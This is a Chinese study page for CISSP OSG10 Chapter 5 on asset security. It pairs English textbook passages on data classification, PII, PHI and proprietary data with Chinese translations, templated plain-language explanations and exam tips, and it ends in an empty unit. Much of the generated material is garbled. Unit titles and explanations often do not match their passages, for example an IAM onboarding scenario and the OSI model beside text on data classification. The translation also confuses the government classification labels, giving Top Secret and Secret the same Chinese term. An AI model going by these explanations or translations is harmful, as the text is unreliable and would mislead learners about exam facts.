可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
审计 审计检查控制是否存在、是否有效、是否符合要求。
第 5 章 · P324-371 · 48 个学习单元

保护资产安全

OSG10 · Chapter 5 · Protecting Security of Assets · 全文覆盖 + 小白精读 + 画报

第 5 章:保护资产安全

这不是提炼版。本页按 PDF 第 324-371 页连续覆盖第 5 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

48个连续学习单元
4格原文 / 直译 / 解释 / 考点
48页覆盖第5章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P324

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 2.0: Asset Security 2.1 Identify and classify information and assets 2.1.1 Data classification 2.1.2 Asset classification 2.2 Establish information and asset handling requirements 2.4 Manage data lifecycle 2.4.1 Data roles (i.e., owners, controllers, custodians, processors, users/subjects) 2.4.2 Data collection 2.4.3 Data location 2.4.4 Data maintenance 2.4.5 Data retention 2.4.6 Data remanence 2.4.7 Data destruction 2.5 Ensure appropriate asset retention (e.g., end of life (EOL), end of support) 2.6 Determine data security controls and compliance requirements 2.6.1 Data states (e.g., in use, in transit, at rest) 2.6.2 Scoping and tailoring 2.6.3 Standards selection 2.6.4 Data protection methods (e.g., Digital Rights Management (DRM), data loss prevention (DLP), cloud access security broker (CASB)) The Asset Security domain focuses on collecting, handling, and protecting information throughout its life cycle.

A primary step in this domain is classifying information based on its value to the organization. All follow-on

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域 2.0:资产安全 2.1 识别和分类信息与资产 2.1.1 数据分类 2.1.2 资产分类 2.2 建立信息与资产处理要求 2.4 管理数据生命周期 2.4.1 数据角色(即所有者、控制者、保管者、处理者、用户/ 主体) 2.4.2 数据收集 2.4.3 数据位置 2.4.4 数据维护 2.4.5 数据保留 2.4.6 数据残留 2.4.7 数据销毁 2.5 确保适当的资产保留(例如,生命周期结束(EOL)、支持结束) 2.6 确定数据安全控制和合规要求 2.6.1 数据状态(例如,使用中、传输中、静态存储) 2.6.2 范围界定和定制 2.6.3 标准选择 2.6.4 数据保护方法(例如,数字版权管理(DRM)、数据防 泄漏(DLP)、云访问安全代理(CASB)) 资产安全领域专注于在整个生命周期内收集、处理和保护信息。 本领域的一 个主要步骤是根据信息对组织的价值对其进行分类。 所有后续

小白解释

场景先行:你是公司的安全负责人,正在读第 324 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

保留期限:保留期限规定数据、日志或记录要保存多久。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

分类由数据所有者决定,保护由保管者实施。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 02 / PDF P325

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

actions vary depending on the classification. For example, highly classified data requires stringent security controls. In contrast, unclassified data uses fewer security controls. Identifying and Classifying Information and Assets Managing the data life cycle refers to protecting it from the cradle to the grave. Steps need to be taken to protect the data when it is first created until it is destroyed. One of the first steps in the life cycle is identifying and classifying information and assets. Organizations often include classification definitions within a security policy. Personnel then label assets appropriately based on the security policy requirements.

In this context, assets include sensitive data, the hardware used to process it, and the media used to hold it. Defining Sensitive Data Sensitive data is any information that isn't public or unclassified. It can include confidential, proprietary, protected, or any other type of data that an organization needs to protect due to its value to the organization, or to comply with existing laws and regulations. Personally Identifiable Information Personally identifiable information (PII) is any information that can identify an individual.

National Institute of Standards and Technology (NIST) Special Publication (SP) 800-122 provides a more formal definition: Any information about an individual maintained by an agency, including 1. any information that can be used to distinguish or trace an individual's identity, such as name, social security number, date and place of birth, mother's maiden name, or biometric records; and 2. any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information. The key is that organizations have a responsibility to protect PII. This includes PII related to employees and customers.

Many laws require organizations to notify individuals if a data breach results in a compromise of PII.

中文直译 / 整理

操作因分类而异。 例如,高度分类的数据需要严格的安全控制。 相比之下, 未分类的数据使用较少的安全控制。 识别和分类信息与资产 管理数据生命周期是指从数据产生到销毁的全过程对其进行保护。 在数据创 建之初直至其被销毁之前,都需要采取措施加以保护。 生命周期中的第一步之一是识别和分类信息与资产。 组织通常在安全策略中包 含分类定义。 人员随后根据安全策略的要求对资产进行适当标记。 在此背景下, 资产包括敏感数据、用于处理数据的硬件以及用于存储数据的介质。 定义敏感数据 敏感数据是指任何非公开或非未分类的信息。 它可能包括机密、专有、受保 护或其他任何因对组织具有价值或为遵守现有法律法规而需要保护的数据类 型。 个人身份信息 个人身份信息(PII)是指任何能够识别个人身份的信息。 美国国家标准与技术 研究院(NIST)特别出版物(SP)800‑122提供了更正式的定义: 由机构维护的有关任何个人的任何信息,包括 1. 可用于区分或追溯个人身份的任何信息,例如姓名、社会安全号码、 出生日期和地点、母亲的婚前姓氏或生物识别记录; 以及 2. 与个人相关联或可关联的任何其他信息,例如医疗、教育、财务和就业信 息。

关键在于组织有责任保护个人身份信息(PII)。 这包括与员工和客户相关的 PII。 许多法律要求组织在数据泄露导致PII泄露时通知个人。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P326

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Protection for personally identifiable information (PII) drives privacy and confidentiality requirements for rules, regulations, and legislation worldwide (especially in North America and the European Union). NIST SP 800-122—Guide to Protecting the Confidentiality of Personally Identifiable Information (PII), provides more information on how to protect PII. It is available from the NIST Special Publications (800 Series) download page: http://csrc.nist.gov/publications/sp800. Protected Health Information In the United States, the Health Insurance Portability and Accountability Act (HIPAA) mandates the protection of some health records.

To fully understand what information is covered by HIPAA, we need to look at a few definitions. First, the general definition of health information is: Health information means any information, whether oral or recorded in any form or medium, that— (A) is created or received by a health care provider, health plan, public health authority, employer, life insurer, school or university, or health care clearinghouse; and (B) relates to the past, present, or future physical or mental health or condition of any individual, the provision of health care to an individual, or the past, present, or future payment for the provision of health care to an individual.

Protected health information (PHI) is any health information that is transmitted in electronic form, maintained in electronic media, or transmitted or maintained in any other form or media. Education records, employment records of a covered entity, and records relating to individuals who have been deceased more than 50 years are excluded from the definition of PHI. Some people think that only medical care providers, such as doctors and hospitals, need to protect PHI. However, HIPAA defines PHI much more broadly. The law applies to healthcare providers, health insurers, and health information clearinghouses, as well as business associates of those organizations that handle PHI.

Employers that provide health insurance may

中文直译 / 整理

对个人身份信息(PII)的保护推动了全球范围内关于规则、法规和立法 的隐私和保密要求(尤其是在北美和欧盟)。 NIST SP 800‑122——《保护个 人身份信息(PII)机密性指南》提供了更多关于如何保护PII的信息。 该指 南可从NIST特殊出版物(800系列)下载页面获取: http://csrc.nist.gov/publications/sp800。 受保护的健康信息 在美国,《健康保险可携性和责任法案》(HIPAA)要求保护部分健康记录。 要全面理解HIPAA所涵盖的信息,我们需要查看几个定义。 首先,健康信息 的一般定义为: 健康信息是指任何以口头或任何形式或媒介记录的信息,该信息—— (A) 由医疗服务提供者、健康计划、公共卫生机构、雇主、人寿保险公司、 学校或大学,或健康信息交换中心创建或接收; 并且 (B) 涉及任何个人过去、现在或未来的身体或精神健康状况、向个人提供医 疗服务,或向个人提供医疗服务的过去、现在或未来付款。 受保护的健康信息(PHI)是指以电子形式传输、以电子媒介保存,或以任何 其他形式或媒介传输或保存的任何健康信息。

教育记录、受覆盖实体的雇员记 录,以及死亡超过50年的个人的相关记录,不包括在PHI的定义中。 有些人认为,只有医疗保健提供者,如医生和医院,才需要保护PHI。 然而, HIPAA对PHI的定义要广泛得多。 该法律适用于医疗保健提供者、健康保险公 司和健康信息交换所,以及处理PHI的这些组织的业务伙伴。 提供健康保险的 雇主可能

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
身份 身份是主体在系统中的标识。
学习单元 04 / PDF P327

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

handle PHI, so HIPAA applies to a large percentage of organizations in the United States. Proprietary Data Proprietary data refers to any data that helps an organization maintain a competitive edge. It could be software code it developed, technical plans for products, internal processes, intellectual property, or trade secrets. If competitors gain access to the proprietary data, it can seriously affect the primary mission of an organization. Although copyright, patent, and trade secret laws provide a level of protection for proprietary data, this isn't always enough. Many criminals ignore copyrights, patents, and laws.

Similarly, foreign entities have stolen a significant amount of proprietary data. Defining Data Classifications Organizations typically include data classifications in their security policy or a data policy. A data classification identifies the value of the data to the organization and is critical to protect data confidentiality and integrity. The policy identifies classification labels used within the organization. It also identifies how data owners can determine the proper classification and how personnel should protect data based on its classification. As an example, government data classifications include top secret, secret, confidential, and unclassified.

Anything above unclassified is sensitive data, but clearly, these have different values. The U.S. government provides clear definitions for these classifications. As you read them, note that the wording of each definition is close except for a few key words.

Top secret uses the phrase “exceptionally grave damage,” secret uses the phrase “serious damage,” and confidential uses “damage”: Top Secret The top secret label is “applied to information, the unauthorized disclosure of which reasonably could be expected to cause exceptionally grave damage to the national security that the original classification authority is able to identify or describe.” Secret The secret label is “applied to information, the unauthorized disclosure of which reasonably could be expected to cause serious damage to the national security that the original classification authority is able to identify or describe.”

中文直译 / 整理

处理PHI,因此HIPAA适用于美国的大量组织。 专有数据 专有数据是指任何有助于组织保持竞争优势的数据。 它可能是组织开发的软 件代码、产品技术计划、内部流程、知识产权或商业秘密。 如果竞争对手获 取了这些专有数据,可能会严重损害组织的主要使命。 尽管版权法、专利法和商业秘密法为专有数据提供了一定程度的保护,但这并 不总是足够的。 许多犯罪分子无视版权、专利和法律。 同样,外国实体也窃取 了大量专有数据。 定义数据分类 组织通常在其安全政策或数据政策中包含数据分类。 数据分类用于标识数据对 组织的价值,对于保护数据的机密性和完整性至关重要。 该政策明确了组织内 使用分类标签,同时说明了数据所有者如何确定适当的分类,以及人员应如何 根据数据的分类来保护数据。 例如,政府数据分类包括绝密、机密、秘密和非密。 任何高于非密级别的数据 均为敏感数据,但显然它们的价值各不相同。 美国政府为这些分类提供了明确 的定义。 在阅读这些定义时,请注意,每个定义的措辞几乎相同,仅少数关键 词不同。

绝密使用“极其严重的损害”一词,机密使用“严重损害”一词,而 秘密仅使用“损害”: 机密 机密标签是“应用于信息,未经授权的披露可能合理地预期会对国家 安全造成特别严重的损害,而原始分类权威机构能够识别或描述此类损害。 ” 机密 机密标签是“应用于信息,其未经授权的披露合理地可能对国家安全 造成严重损害,而原始分类机构能够识别或描述此类损害。 ”

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

Owner 定规则,Custodian 执行保护。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
政策 政策是高层原则,说明必须遵守什么。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
学习单元 05 / PDF P328

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Confidential The confidential label is “applied to information, the unauthorized disclosure of which reasonably could be expected to cause damage to the national security that the original classification authority is able to identify or describe.” Unclassified Unclassified refers to any data that doesn't meet one of the descriptions for top secret, secret, or confidential data. Within the United States, unclassified data is available to anyone, though it often requires individuals to request the information using procedures identified in the Freedom of Information Act (FOIA).

There are additional subclassifications of unclassified, such as for official use only (FOUO), sensitive but unclassified (SBU), and controlled unclassified information (CUI). Documents with these designations have strict controls limiting their distribution. As an example, the U.S. Internal Revenue Service (IRS) uses SBU for individual tax records, restricting access to these records. A classification authority is the entity that applies the original classification to the sensitive data, and there are strict rules that identify who can do so. For example, the U.S. president, vice president, and agency heads can classify data in the United States.

Additionally, individuals in any of these positions can delegate permission for others to classify data. Although the focus of classifications is often on data, these classifications also apply to hardware assets. This includes any computing system or media that processes or holds this data. Nongovernmental organizations rarely need to classify their data based on potential damage to national security. However, management is concerned about potential damage to the organization. For example, if attackers accessed the organization's data, what is the potential adverse impact? In other words, an organization doesn't just consider the sensitivity of the data but also the criticality of the data.

They could use the same phrases of “exceptionally grave damage,” “serious damage,” and “damage” that the U.S. government uses when describing top secret, secret, and confidential data. Some nongovernmental organizations use labels such as Class 3, Class 2, Class 1, and Class 0. Other organizations use more meaningful labels such as

中文直译 / 整理

保密 保密标签是“应用于信息,其未经授权的披露合理地可能对国家安全 造成损害,而原始分类机构能够识别或描述此类损害。 ” 未分类未分类是指不符合绝密、秘密或机密数据任何描述的任何数据。 在 美国,未分类数据对任何人开放,但通常要求个人根据《信息自由法》 (FOIA)中规定的程序申请获取这些信息。 未分类数据还有额外的子分类,例如仅限官方使用(FOUO)、敏 感但未分类(SBU)和受控未分类信息(CUI)。 带有这些标识的 文件有严格的控制措施限制其分发。 例如,美国国税局(IRS)将 SBU用于个人税务记录,限制对这些记录的访问。 分类权威机构是负责对敏感数据进行原始分类的实体,且有严格规定明确谁可 以执行此操作。 例如,美国总统、副总统和各机构负责人在美国有权对数据进 行分类。 此外,这些职位的任何个人都可以授权他人对数据进行分类。 尽管分类的重点通常在于数据,但这些分类同样适用于硬件资产。 这 包括任何处理或存储该数据的计算系统或介质。 非政府组织很少需要根据数据对国家安全可能造成的损害进行分类。 然而, 管理层关注的是对组织可能造成的损害。 例如,如果攻击者访问了组织的数 据,可能产生哪些不利影响?

换句话说,组织不仅考虑数据的敏感性,还考 虑数据的关键性。 它们可以使用与美国政府描述绝密、秘密和机密数据时相 同的术语,即“特别严重的损害”、“严重损害”和“损害”。 一些非政府组织使用诸如三级、二级、一级和零级之类的标签。 其他组织则使用 更有意义的标签,例如

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 06 / PDF P329

第 329 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

confidential (or proprietary), private, sensitive, and public. Figure 5.1 shows the relationship between these different classifications, with the government classifications on the left and the nongovernment (or civilian) classifications on the right. Just as the government can define the data based on the potential adverse impact from a data breach, organizations can use similar descriptions. FIGURE 5.1 Data classifications Both government and civilian classifications identify the relative value of the data to the organization, with top secret representing the highest classification for governments and confidential representing the highest classification for organizations in Figure 5.1.

However, it's important to remember that organizations can use any labels they desire. The following sections identify the meaning of some common nongovernment classifications. Remember, even though these are commonly used, there is no standard that all private organizations must use. Confidential or Proprietary The confidential or proprietary label typically refers to the highest level of classified data. In this context, a data breach would cause exceptionally grave damage to the mission of the

中文直译 / 整理

机密(或专有)、私有、敏感和公开。 图5.1展示了这些不同分类之间的关系, 其中政府分类位于左侧,非政府(或民用)分类位于右侧。 正如政府可以根据 数据泄露的潜在不利影响来定义数据一样,组织也可以使用类似的描述。 图 5.1 数据分类 政府和民用分类均识别数据对组织的相对价值,其中机密代表政府的最高分类, 而保密代表组织在图 5.1中的最高分类。 然而,重要的是要记住,组织可以使用 任何他们希望的标签。 以下部分介绍了某些常见非政府分类的含义。 请记住, 尽管这些分类被广泛使用,但并没有一个所有私营组织必须遵循的标准。 机密或专有 机密或专有标签通常指最高级别的分类数据。 在此背景下,数据 泄露将对组织的使命造成极其严重的损害

小白解释

场景先行:你是公司的安全负责人,正在读第 329 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 329 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

分类由数据所有者决定,保护由保管者实施。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
学习单元 07 / PDF P330

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

organization. As an example, attackers have repeatedly attacked Sony, stealing more than 100 terabytes of data, including full-length versions of unreleased movies. These quickly showed up on file-sharing sites, and security experts estimate that people downloaded these movies up to a million times. With pirated versions of the movies available, many people skipped seeing them when Sony ultimately released them. This directly affected Sony's bottom line. The movies were proprietary, and the organization might have considered it exceptionally grave damage. In retrospect, they may choose to label movies as confidential or proprietary and use the strongest access controls to protect them.

Private The private label refers to data that should stay private within the organization but that doesn't meet the definition of confidential or proprietary data. In this context, a data breach would cause serious damage to the mission of the organization. Many organizations label PII and PHI data as private. It's also common to label internal employee data and some financial data as private. As an example, the payroll department of a company would have access to payroll data, but this data is not available to regular employees. Sensitive Sensitive data is similar to confidential data. In this context, a data breach would cause damage to the mission of the organization.

As an example, IT personnel within an organization might have extensive data about the internal network, including the layout, devices, operating systems, software, Internet Protocol (IP) addresses, and more. If attackers have easy access to this data, it makes it much easier for them to launch attacks. Management may decide they don't want this information available to the public, so they might label it as sensitive. Public Public data is similar to unclassified data. It includes information posted on websites, in brochures, or any other public source. Although an organization doesn't protect the confidentiality of public data, it does take steps to protect its integrity.

For example, anyone can view public data posted on a website. However, an organization doesn't want attackers to modify this data, so it takes steps to protect it. Civilian organizations aren't required to use any specific classification labels. However, it is important to classify data in some manner and ensure personnel understand the classifications. No matter what labels an organization uses, it still has an obligation to protect sensitive information. After classifying the data, an organization takes additional steps to manage it based on its classification. Unauthorized access to sensitive information can

中文直译 / 整理

组织。 例如,攻击者多次攻击索尼,窃取了超过100太字节的数据,包括未发行 电影的完整版本。 这些电影很快出现在文件共享网站上,安全专家估计,人们 下载这些电影的次数高达一百万次。 由于盗版电影已可获取,许多人最终在索 尼发布时选择不观看。 这直接影响了索尼的收益。 这些电影属于专有内容,组 织可能认为这构成了极其严重的损害。 回顾此事,他们可能会选择将电影标记 为机密或专有,并使用最强的访问控制来保护它们。 私有 私有 标签指应在组织内部保持私密的数据,但这些数据不符合机密或专有 数据的定义。 在此背景下,数据泄露会对组织的使命造成严重损害。 许多组织将 个人身份信息(PII)和受保护的健康信息(PHI)标记为私有数据。 将内部员工 数据和部分财务数据标记为私有也很常见。 例如,公司的薪酬部门可以访问薪酬 数据,但这些数据对普通员工不可用。 敏感 敏感数据 与机密数据类似。 在此背景下,数据泄露会对组织的使命造成 损害。 例如,组织内的IT人员可能掌握有关内部网络的大量数据,包括网络拓 扑、设备、操作系统、软件、互联网协议(IP)地址等。 如果攻击者能够轻易 获取这些数据,将大大增加他们发动攻击的便利性。

管理层可能决定不希望这 些信息对外公开,因此可能会将其标记为敏感数据。 公开 公开数据 类似于未分类数据。 它包括发布在网站、小册子或其他任何公共 来源的信息。 尽管组织不保护公开数据的机密性,但它会采取措施保护其完整 性。 例如,任何人都可以查看网站上发布的公开数据。 然而,组织不希望攻击 者修改这些数据,因此会采取措施对其进行保护。 民用组织没有义务使用任何特定的分类标签。 然而,以某种方式对数据进行分 类并确保人员理解这些分类非常重要。 无论组织使用何种标签,它仍有义务保 护敏感信息。 在对数据进行分类后,组织会根据其分类采取额外措施进行管理。 未经授权访问敏感信息可 能导致

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
学习单元 08 / PDF P331

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

